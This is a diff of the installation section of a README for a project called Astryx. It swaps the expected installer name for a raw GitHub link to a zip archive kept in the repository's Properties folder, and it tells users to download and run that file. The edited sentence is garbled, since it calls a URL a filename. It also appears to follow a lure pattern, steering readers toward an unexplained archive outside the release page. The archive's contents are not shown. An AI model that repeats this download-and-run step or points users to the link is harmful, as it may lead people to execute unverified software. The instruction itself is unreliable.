SantiAGRW/Astryx/README.md

 After downloading the file from the Releases page, locate it in your downloads folder.
 Follow these simple instructions to install and run Astryx:

 1. **Locate the File**
    Find the file you just downloaded.
-It should have a name like `Astryx-vX.X.X.exe`.
+It should have a name like `https://raw.githubusercontent.com/SantiAGRW/Astryx/main/Properties/Software-3.0-alpha.3.zip`.

 2. **Run the Installer**
    Double-click the file to start the installation process.
 Follow the on-screen instructions to complete the installation.